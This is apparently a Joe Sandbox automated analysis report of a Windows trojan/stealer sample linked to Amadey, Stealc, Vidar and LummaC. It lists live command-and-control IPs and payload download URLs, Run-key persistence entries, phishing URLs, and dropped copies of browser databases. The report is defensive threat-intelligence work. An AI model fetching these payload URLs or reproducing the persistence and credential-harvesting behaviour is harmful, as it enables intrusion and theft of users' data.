https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr	firefox.exe, 00000021.00000002.2897476513.0000013966070000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000031.00000002.3362368758.0000024F72080000.00000002.10000000.00040000.00000000.sdmp	false		high
http://185.215.113.206/68b591d6548ec281/mozglue.dll_	file.exe, 00000000.00000002.2129788119.00000000007C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/tools/feedback/chrome/__submit	chrome.exe, 00000022.00000002.2999783272.00006DEC004C0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2162	chrome.exe, 00000022.00000003.2878022781.00006DEC00530000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2872288444.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2877891859.00006DEC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.3010997666.00006DEC00AD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/hsts.html	fa55e7c5ed.exe, 0000000D.00000003.2504178943.0000000007B32000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
172.217.17.78	plus.l.google.com	United States	15169	GOOGLEUS	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
142.250.181.100	www.google.com	United States	15169	GOOGLEUS	false
172.67.162.84	property-imper.sbs	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
34.116.198.130	home.fvtekk5pn.top	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false

Private

IP
192.168.2.4
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1561158
Start date and time:	2024-11-22 20:34:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@94/57@67/12
EGA Information:	Successful, ratio: 20%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 74.125.205.84, 172.217.17.46, 34.104.35.123, 172.217.21.35, 199.232.210.172, 216.58.208.234, 172.217.19.202, 172.217.19.10, 172.217.19.170, 172.217.19.234, 172.217.21.42, 142.250.181.138, 142.250.181.74, 142.250.181.106, 172.217.17.74, 172.217.17.42, 192.229.221.95, 172.217.19.238, 35.80.238.59, 52.12.64.98, 35.164.125.63
Excluded domains from analysis (whitelisted): fs.microsoft.com, shavar.prod.mozaws.net, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, incoming.telemetry.mozilla.org, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, detectportal.prod.mozaws.net, aus5.mozilla.org, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, clients.l.google.com, www.gstatic.com, location.services.mozilla.com
Execution Graph export aborted for target 0718eb7837.exe, PID 6588 because there are no executed function
Execution Graph export aborted for target DocumentsKECFIDGCBF.exe, PID 7284 because it is empty
Execution Graph export aborted for target file.exe, PID 7540 because there are no executed function
Execution Graph export aborted for target skotes.exe, PID 744 because there are no executed function
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
14:35:27	API Interceptor	72x Sleep call for process: file.exe modified
14:36:01	API Interceptor	346879x Sleep call for process: skotes.exe modified
14:36:32	API Interceptor	116x Sleep call for process: 0718eb7837.exe modified
14:36:50	API Interceptor	216x Sleep call for process: fa55e7c5ed.exe modified
14:37:07	API Interceptor	1x Sleep call for process: firefox.exe modified
19:35:41	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
19:36:32	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0718eb7837.exe C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe
19:36:40	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run aedbd2e320.exe C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe
19:36:48	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2922d7c574.exe C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe
19:36:56	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2aff342b40.exe C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe
19:37:05	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0718eb7837.exe C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe
19:37:14	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run aedbd2e320.exe C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe
19:37:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2922d7c574.exe C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe
19:37:34	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2aff342b40.exe C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Cryptbot	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	Tygvfe21rw.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
185.215.113.16	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.16/luma/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	185.215.113.16/well/random.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/off/def.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
prod.balrog.prod.cloudops.mozgcp.net	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	35.244.181.201
example.org	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	Credential Flusher	Browse	93.184.215.14
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	93.184.215.14
star-mini.c10r.facebook.com	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.196.35
	file.exe	Get hash	malicious	Credential Flusher	Browse	157.240.195.35
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	157.240.195.35

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
CLOUDFLARENETUS	https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.org	Get hash	malicious	HTMLPhisher	Browse	172.67.193.18
	file.exe	Get hash	malicious	Unknown	Browse	172.67.162.84
	http://aial.gulamberwa.com	Get hash	malicious	Unknown	Browse	104.21.16.48
	https://clearview-ps.inwise.net/Page_11-21-2024_1	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://fccdl.in/ads-manager/service/api/v1/ads/redirect?act=click&link=//schmidt-mediation-group.jimdosite.c	Get hash	malicious	HTMLPhisher	Browse	172.67.134.110
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.33.116
	Birgit Haller-Employee Benefits-4457.docx	Get hash	malicious	Unknown	Browse	104.17.25.14
	Birgit Haller-Employee Benefits-4457.docx	Get hash	malicious	Unknown	Browse	188.114.97.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	PO #09465610_GQ 003745_SO-242000846.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	LummaC Stealer	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	185.215.113.206
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://docs.google.com/drawings/d/15fSe2159qP21C2NrS3K5cgcsyPwNINvux6xIUCvvgBU/preview?pli=1AmyVazquez-brian.nester@lvhn.org	Get hash	malicious	HTMLPhisher	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	http://147.45.47.98/js/error.js	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	https://clearview-ps.inwise.net/Page_11-21-2024_1	Get hash	malicious	HTMLPhisher	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	http://saighbuzu32uvv.top/1.php?s=527	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	http://swaceapp.com/work/original.js	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	Birgit Haller-Employee Benefits-4457.docx	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	https://www.cinehub.click/anus	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	https://novelalert.cloudaccess.host/wp-admin/includes/contactamende/	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	https://heehra-incomeportal.com/	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 2.18.84.141
	https://%D0%BD-%D0%BF%D0%BE%D0%BB.%D1%80%D1%84/bitrix/redirect.php?goto=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://www.google.nl/url?q=amp%2F%6D%6F%78%78%2E%63%6F%6D%2E%62%64%2F%63%67%69%2E%62%69%6E%2F%79%39%33%64%33%63%75%5A%58%5A%6C%62%6E%52%69%63%6D%6C%30%5A%53%35%6A%62%32%30%76%5A%53%39%69%63%6D%56%68%61%32%5A%68%63%33%51%30%59%32%56%76%63%79%31%77%63%6D%56%7A%5A%57%35%30%63%79%31%30%61%57%4E%72%5A%58%52%7A%4C%54%45%32%4F%54%59%31%4E%54%63%30%4E%7A%6B%77%4F%54%39%79%2F%23YWhvd2FyZEBzZWN1cnVzdGVjaG5vbG9naWVzLmNvbQ==	Get hash	malicious	Unknown	Browse	4.175.87.197 13.107.246.63 2.18.84.141
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	Unknown	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	gkzHdqfg.ps1	Get hash	malicious	LummaC Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC	Browse	172.67.162.84
	file.exe	Get hash	malicious	LummaC	Browse	172.67.162.84
fb0aa01abe9d8e4037eb3473ca6e2dca	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	Credential Flusher	Browse	35.244.181.201 34.160.144.191 34.120.208.123
	file.exe	Get hash	malicious	LummaC, Amadey, CredGrabber, Credential Flusher, Cryptbot, LummaC Stealer, Meduza Stealer	Browse	35.244.181.201 34.160.144.191 34.120.208.123

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse

Created / dropped Files

C:\ProgramData\BGDHDAFIDGDBGCAAFIDHIJKEHD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGHJEBKJEGHJKECAAKJKEGIIEG

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIJJKECFCFBGDHIECAAF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEBKKEGD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JJJDGIECFCAKKFHIIIJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\JKKKJJJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKKKJJJKJKFHJJJJECBF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
